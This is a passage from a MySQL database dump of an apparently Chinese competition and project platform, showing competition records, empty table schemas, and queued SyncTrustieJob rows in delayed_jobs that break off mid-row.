16:33:00','2019-10-30 16:36:20','2020-09-23 08:52:07',1,'勇者无敌',2,0,0,NULL),(15,'数据标注大赛','2019-11-26 13:54:00','2019-12-20 13:54:00',NULL,0,'2019-11-11 17:27:19',413,0,1,5,'2019-11-19 13:54:00','2019-11-10 13:54:41','2019-11-25 08:36:13',1,'协同开放',11,0,0,NULL),(16,'aa','2019-11-25 21:28:00','2019-11-30 21:28:00','@33ID',0,'2019-11-25 06:15:20',94,0,1,1,'2019-11-25 21:28:00','2019-11-24 21:29:30','2020-08-14 11:09:24',0,'ccc',3,0,0,NULL),(17,'qqqq','2019-11-30 08:42:00','2019-12-31 08:42:00',NULL,0,'2019-11-25 08:43:10',10,0,1,9,'2019-11-27 08:42:00','2019-11-25 08:42:15','2019-11-25 11:07:25',0,'aaaa',4,0,0,NULL),(18,'assttt','2019-11-26 09:09:00','2019-11-30 09:09:00',NULL,0,'2019-11-25 09:10:01',18,0,1,10,'2019-11-26 09:09:00','2019-11-25 09:09:38','2019-11-25 11:07:21',0,'89999',3,0,0,NULL),(19,'障碍越野挑战赛','2020-03-19 17:22:00','2020-03-31 15:22:00',NULL,0,'2020-09-22 12:22:53',0,0,1,1,'2020-03-19 15:22:00','2020-03-18 15:33:30','2020-09-23 08:50:58',0,'突破2020',0,0,0,NULL),(20,'哇塞 ','2020-03-18 17:35:00','2020-03-28 15:35:00',NULL,0,'2020-03-18 15:57:48',100,0,1,5,'2020-03-18 16:35:00','2020-03-18 15:46:34','2020-08-14 11:09:07',0,'第三方',2,0,0,NULL),(21,'0318 测试','2020-03-27 15:50:00','2020-06-15 15:50:00',NULL,0,'2020-08-25 10:15:54',365,0,1,6,'2020-03-20 15:50:00','2020-03-18 15:50:28','2020-08-25 14:59:43',0,'终极超越',9,0,10,NULL),(22,'11','2020-04-21 16:20:00','2020-03-31 16:20:00',NULL,0,'2020-03-18 16:38:45',17,0,1,5,'2020-03-19 16:20:00','2020-03-18 16:20:46','2020-08-14 11:08:55',0,'22',4,0,0,NULL),(23,'122','2020-03-19 17:44:00','2020-03-28 15:44:00',NULL,0,'2020-08-14 11:08:43',0,0,1,1,'2020-03-19 16:44:00','2020-03-19 15:50:14','2020-08-25 10:15:32',0,'122',0,0,0,NULL),(24,'搜索算法大赛','2020-09-10 09:41:00','2020-09-15 09:41:00',NULL,0,'2020-08-17 09:42:37',248,0,1,1,'2020-09-01 09:41:00','2020-08-17 09:42:27','2020-08-17 09:42:37',1,'搜索算法大赛',5,0,0,NULL),(25,'国际C语言代码大赛','2021-03-21 09:43:00','2022-11-30 09:43:00',NULL,0,'2020-08-17 09:45:14',586,0,1,13,NULL,'2020-08-17 09:44:21','2021-03-11 09:41:01',1,'国际C语言代码大赛',9,0,0,''),(26,'测试1','2020-11-28 09:51:00','2020-12-31 09:51:00','123456',0,'2020-08-25 09:54:42',129,0,3,10,'2020-10-22 09:51:00','2020-08-25 09:51:36','2020-09-21 18:30:35',0,'测试11',4,0,9,'测试的竞赛'),(27,'数据标注','2020-10-18 15:18:00','2020-10-31 15:18:00',NULL,0,'2020-10-16 15:20:25',2,0,1,1,'2020-10-17 15:18:00','2020-10-16 15:19:09','2020-10-19 08:42:51',0,'数据标注',1,0,0,'数据集筛选'),(28,'第一届“创新杯”国防科技创新大赛','2021-02-28 08:51:00','2021-04-09 08:51:00',NULL,0,'2021-03-03 14:59:48',10,0,0,3,NULL,'2020-11-09 08:54:25','2021-03-04 10:02:19',0,'理技融创 智胜未来',3,0,0,'');
|
||
/*!40000 ALTER TABLE `competitions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `coo_imgs`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `coo_imgs`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `coo_imgs` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`src_states` varchar(255) DEFAULT NULL,
|
||
`url_states` varchar(255) DEFAULT NULL,
|
||
`img_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `coo_imgs`
|
||
--
|
||
|
||
LOCK TABLES `coo_imgs` WRITE;
|
||
/*!40000 ALTER TABLE `coo_imgs` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `coo_imgs` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `coop_imgs`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `coop_imgs`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `coop_imgs` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`src_states` varchar(255) DEFAULT NULL,
|
||
`url_states` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`img_type` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `coop_imgs`
|
||
--
|
||
|
||
LOCK TABLES `coop_imgs` WRITE;
|
||
/*!40000 ALTER TABLE `coop_imgs` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `coop_imgs` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `cooperations`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `cooperations`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `cooperations` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`mail` varchar(255) DEFAULT NULL,
|
||
`qq` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`user_type` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `cooperations`
|
||
--
|
||
|
||
LOCK TABLES `cooperations` WRITE;
|
||
/*!40000 ALTER TABLE `cooperations` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `cooperations` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `covers`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `covers`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `covers` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`width` int(11) DEFAULT NULL,
|
||
`height` int(11) DEFAULT NULL,
|
||
`size` int(11) DEFAULT NULL,
|
||
`coverable_type` varchar(255) DEFAULT NULL,
|
||
`coverable_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `covers`
|
||
--
|
||
|
||
LOCK TABLES `covers` WRITE;
|
||
/*!40000 ALTER TABLE `covers` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `covers` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `custom_fields`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `custom_fields`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `custom_fields` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`type` varchar(30) NOT NULL DEFAULT '',
|
||
`name` varchar(30) NOT NULL DEFAULT '',
|
||
`field_format` varchar(30) NOT NULL DEFAULT '',
|
||
`possible_values` text,
|
||
`regexp` varchar(255) DEFAULT '',
|
||
`min_length` int(11) NOT NULL DEFAULT '0',
|
||
`max_length` int(11) NOT NULL DEFAULT '0',
|
||
`is_required` tinyint(1) NOT NULL DEFAULT '0',
|
||
`is_for_all` tinyint(1) NOT NULL DEFAULT '0',
|
||
`is_filter` tinyint(1) NOT NULL DEFAULT '0',
|
||
`position` int(11) DEFAULT '1',
|
||
`searchable` tinyint(1) DEFAULT '0',
|
||
`default_value` text,
|
||
`editable` tinyint(1) DEFAULT '1',
|
||
`visible` tinyint(1) NOT NULL DEFAULT '1',
|
||
`multiple` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_custom_fields_on_id_and_type` (`id`,`type`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `custom_fields`
|
||
--
|
||
|
||
LOCK TABLES `custom_fields` WRITE;
|
||
/*!40000 ALTER TABLE `custom_fields` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `custom_fields` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `custom_fields_projects`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `custom_fields_projects`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `custom_fields_projects` (
|
||
`custom_field_id` int(11) NOT NULL DEFAULT '0',
|
||
`project_id` int(11) NOT NULL DEFAULT '0',
|
||
UNIQUE KEY `index_custom_fields_projects_on_custom_field_id_and_project_id` (`custom_field_id`,`project_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `custom_fields_projects`
|
||
--
|
||
|
||
LOCK TABLES `custom_fields_projects` WRITE;
|
||
/*!40000 ALTER TABLE `custom_fields_projects` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `custom_fields_projects` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `custom_fields_trackers`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `custom_fields_trackers`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `custom_fields_trackers` (
|
||
`custom_field_id` int(11) NOT NULL DEFAULT '0',
|
||
`tracker_id` int(11) NOT NULL DEFAULT '0',
|
||
UNIQUE KEY `index_custom_fields_trackers_on_custom_field_id_and_tracker_id` (`custom_field_id`,`tracker_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `custom_fields_trackers`
|
||
--
|
||
|
||
LOCK TABLES `custom_fields_trackers` WRITE;
|
||
/*!40000 ALTER TABLE `custom_fields_trackers` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `custom_fields_trackers` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `custom_values`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `custom_values`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `custom_values` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`customized_type` varchar(30) NOT NULL DEFAULT '',
|
||
`customized_id` int(11) NOT NULL DEFAULT '0',
|
||
`custom_field_id` int(11) NOT NULL DEFAULT '0',
|
||
`value` text,
|
||
PRIMARY KEY (`id`),
|
||
KEY `custom_values_customized` (`customized_type`,`customized_id`),
|
||
KEY `index_custom_values_on_custom_field_id` (`custom_field_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `custom_values`
|
||
--
|
||
|
||
LOCK TABLES `custom_values` WRITE;
|
||
/*!40000 ALTER TABLE `custom_values` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `custom_values` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `data_exceptions`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `data_exceptions`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `data_exceptions` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`message` varchar(255) DEFAULT NULL,
|
||
`container_id` int(11) DEFAULT NULL,
|
||
`container_type` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `data_exceptions`
|
||
--
|
||
|
||
LOCK TABLES `data_exceptions` WRITE;
|
||
/*!40000 ALTER TABLE `data_exceptions` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `data_exceptions` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `delayed_jobs`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `delayed_jobs`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `delayed_jobs` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`priority` int(11) NOT NULL DEFAULT '0',
|
||
`attempts` int(11) NOT NULL DEFAULT '0',
|
||
`handler` text NOT NULL,
|
||
`last_error` text,
|
||
`run_at` datetime DEFAULT NULL,
|
||
`locked_at` datetime DEFAULT NULL,
|
||
`failed_at` datetime DEFAULT NULL,
|
||
`locked_by` varchar(255) DEFAULT NULL,
|
||
`queue` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime DEFAULT NULL,
|
||
`updated_at` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `delayed_jobs_priority` (`priority`,`run_at`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=209 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `delayed_jobs`
|
||
--
|
||
|
||
LOCK TABLES `delayed_jobs` WRITE;
|
||
/*!40000 ALTER TABLE `delayed_jobs` DISABLE KEYS */;
|
||
INSERT INTO `delayed_jobs` VALUES (86,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2019-12-04 08:21:58',NULL,NULL,NULL,'default','2019-12-04 08:21:58','2019-12-04 08:21:58'),(87,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-01 12:47:12',NULL,NULL,NULL,'default','2020-02-01 12:47:12','2020-02-01 12:47:12'),(88,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-01 18:52:39',NULL,NULL,NULL,'default','2020-02-01 18:52:39','2020-02-01 18:52:39'),(89,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-01 19:03:09',NULL,NULL,NULL,'default','2020-02-01 19:03:09','2020-02-01 19:03:09'),(90,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-01 20:34:46',NULL,NULL,NULL,'default','2020-02-01 20:34:46','2020-02-01 20:34:46'),(91,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-01 21:17:31',NULL,NULL,NULL,'default','2020-02-01 21:17:31','2020-02-01 21:17:31'),(92,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-01 22:24:23',NULL,NULL,NULL,'default','2020-02-01 22:24:23','2020-02-01 22:24:23'),(93,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-01 22:26:36',NULL,NULL,NULL,'default','2020-02-01 22:26:36','2020-02-01 22:26:36'),(94,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-02 23:36:38',NULL,NULL,NULL,'default','2020-02-02 23:36:38','2020-02-02 23:36:38'),(95,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-03 12:08:29',NULL,NULL,NULL,'default','2020-02-03 12:08:29','2020-02-03 12:08:29'),(96,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-03 16:57:11',NULL,NULL,NULL,'default','2020-02-03 16:57:11','2020-02-03 16:57:11'),(97,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-03 17:19:19',NULL,NULL,NULL,'default','2020-02-03 17:19:19','2020-02-03 17:19:19'),(98,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-03 17:36:28',NULL,NULL,NULL,'default','2020-02-03 17:36:28','2020-02-03 17:36:28'),(99,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-03 17:45:42',NULL,NULL,NULL,'default','2020-02-03 17:45:42','2020-02-03 17:45:42'),(100,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-03 19:30:28',NULL,NULL,NULL,'default','2020-02-03 19:30:28','2020-02-03 19:30:28'),(101,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-03 19:30:53',NULL,NULL,NULL,'default','2020-02-03 19:30:53','2020-02-03 19:30:53'),(102,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-04 22:00:19',NULL,NULL,NULL,'default','2020-02-04 22:00:19','2020-02-04 22:00:19'),(103,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-04 22:09:45',NULL,NULL,NULL,'default','2020-02-04 22:09:45','2020-02-04 22:09:45'),(104,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:29:30',NULL,NULL,NULL,'default','2020-02-05 10:29:30','2020-02-05 10:29:30'),(105,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:30:48',NULL,NULL,NULL,'default','2020-02-05 10:30:48','2020-02-05 10:30:48'),(106,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:31:59',NULL,NULL,NULL,'default','2020-02-05 10:31:59','2020-02-05 10:31:59'),(107,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:33:10',NULL,NULL,NULL,'default','2020-02-05 10:33:10','2020-02-05 10:33:10'),(108,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:35:26',NULL,NULL,NULL,'default','2020-02-05 10:35:26','2020-02-05 10:35:26'),(109,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:38:36',NULL,NULL,NULL,'default','2020-02-05 10:38:36','2020-02-05 10:38:36'),(110,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:39:59',NULL,NULL,NULL,'default','2020-02-05 10:39:59','2020-02-05 10:39:59'),(111,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:43:18',NULL,NULL,NULL,'default','2020-02-05 10:43:18','2020-02-05 10:43:18'),(112,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:54:45',NULL,NULL,NULL,'default','2020-02-05 10:54:45','2020-02-05 10:54:45'),(113,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:54:48',NULL,NULL,NULL,'default','2020-02-05 10:54:48','2020-02-05 10:54:48'),(114,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:55:15',NULL,NULL,NULL,'default','2020-02-05 10:55:15','2020-02-05 10:55:15'),(115,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:56:00',NULL,NULL,NULL,'default','2020-02-05 10:56:00','2020-02-05 10:56:00'),(116,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 10:58:38',NULL,NULL,NULL,'default','2020-02-05 10:58:38','2020-02-05 10:58:38'),(117,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 11:02:30',NULL,NULL,NULL,'default','2020-02-05 11:02:30','2020-02-05 11:02:30'),(118,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 11:05:02',NULL,NULL,NULL,'default','2020-02-05 11:05:02','2020-02-05 11:05:02'),(119,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 11:24:55',NULL,NULL,NULL,'default','2020-02-05 11:24:55','2020-02-05 11:24:55'),(120,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 11:41:14',NULL,NULL,NULL,'default','2020-02-05 11:41:14','2020-02-05 11:41:14'),(121,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 12:24:57',NULL,NULL,NULL,'default','2020-02-05 12:24:57','2020-02-05 12:24:57'),(122,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 14:48:32',NULL,NULL,NULL,'default','2020-02-05 14:48:32','2020-02-05 14:48:32'),(123,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 14:53:15',NULL,NULL,NULL,'default','2020-02-05 14:53:15','2020-02-05 14:53:15'),(124,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 15:22:57',NULL,NULL,NULL,'default','2020-02-05 15:22:57','2020-02-05 15:22:57'),(125,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-05 16:25:27',NULL,NULL,NULL,'default','2020-02-05 16:25:27','2020-02-05 16:25:27'),(126,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-02-10 12:21:33',NULL,NULL,NULL,'default','2020-02-10 12:21:33','2020-02-10 12:21:33'),(127,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-10 12:26:21',NULL,NULL,NULL,'default','2020-02-10 12:26:21','2020-02-10 12:26:21'),(128,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-10 15:22:56',NULL,NULL,NULL,'default','2020-02-10 15:22:56','2020-02-10 15:22:56'),(129,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-10 15:24:55',NULL,NULL,NULL,'default','2020-02-10 15:24:55','2020-02-10 15:24:55'),(130,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-10 15:37:24',NULL,NULL,NULL,'default','2020-02-10 15:37:24','2020-02-10 15:37:24'),(131,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-11 09:18:05',NULL,NULL,NULL,'default','2020-02-11 09:18:05','2020-02-11 09:18:05'),(132,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-11 09:30:09',NULL,NULL,NULL,'default','2020-02-11 09:30:09','2020-02-11 09:30:09'),(133,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-11 09:39:11',NULL,NULL,NULL,'default','2020-02-11 09:39:11','2020-02-11 09:39:11'),(134,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-11 09:40:38',NULL,NULL,NULL,'default','2020-02-11 09:40:38','2020-02-11 09:40:38'),(135,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-11 09:46:46',NULL,NULL,NULL,'default','2020-02-11 09:46:46','2020-02-11 09:46:46'),(136,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-11 10:06:32',NULL,NULL,NULL,'default','2020-02-11 10:06:32','2020-02-11 10:06:32'),(137,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-02-11 11:10:56',NULL,NULL,NULL,'default','2020-02-11 11:10:56','2020-02-11 11:10:56'),(138,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-03-09 10:22:41',NULL,NULL,NULL,'default','2020-03-09 10:22:41','2020-03-09 10:22:41'),(139,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-03-14 09:33:12',NULL,NULL,NULL,'default','2020-03-14 09:33:12','2020-03-14 09:33:12'),(140,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-03-19 13:54:38',NULL,NULL,NULL,'default','2020-03-19 13:54:38','2020-03-19 13:54:38'),(141,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-03-19 15:08:51',NULL,NULL,NULL,'default','2020-03-19 15:08:51','2020-03-19 15:08:51'),(142,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-03-19 15:09:00',NULL,NULL,NULL,'default','2020-03-19 15:09:00','2020-03-19 15:09:00'),(143,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-03-19 15:10:11',NULL,NULL,NULL,'default','2020-03-19 15:10:11','2020-03-19 15:10:11'),(144,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-03-19 15:12:55',NULL,NULL,NULL,'default','2020-03-19 15:12:55','2020-03-19 15:12:55'),(145,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-03-19 15:13:24',NULL,NULL,NULL,'default','2020-03-19 15:13:24','2020-03-19 15:13:24'),(146,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-03-23 08:27:59',NULL,NULL,NULL,'default','2020-03-23 08:27:59','2020-03-23 08:27:59'),(147,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-03-27 19:19:54',NULL,NULL,NULL,'default','2020-03-27 19:19:54','2020-03-27 19:19:54'),(148,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: project\n',NULL,'2020-05-13 09:17:41',NULL,NULL,NULL,'default','2020-05-13 09:17:41','2020-05-13 09:17:41'),(149,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-07-03 11:51:05',NULL,NULL,NULL,'default','2020-07-03 11:51:05','2020-07-03 11:51:05'),(150,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-08-12 10:41:20',NULL,NULL,NULL,'default','2020-08-12 10:41:20','2020-08-12 10:41:20'),(151,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-08-13 10:19:02',NULL,NULL,NULL,'default','2020-08-13 10:19:02','2020-08-13 10:19:02'),(152,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-08-14 08:58:42',NULL,NULL,NULL,'default','2020-08-14 08:58:42','2020-08-14 08:58:42'),(153,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-08-18 16:36:32',NULL,NULL,NULL,'default','2020-08-18 16:36:32','2020-08-18 16:36:32'),(154,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-08-18 16:41:47',NULL,NULL,NULL,'default','2020-08-18 16:41:47','2020-08-18 16:41:47'),(155,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-08-18 16:43:47',NULL,NULL,NULL,'default','2020-08-18 16:43:47','2020-08-18 16:43:47'),(156,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-09-29 17:20:40',NULL,NULL,NULL,'default','2020-09-29 17:20:40','2020-09-29 17:20:40'),(157,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-10-21 16:47:58',NULL,NULL,NULL,'default','2020-10-21 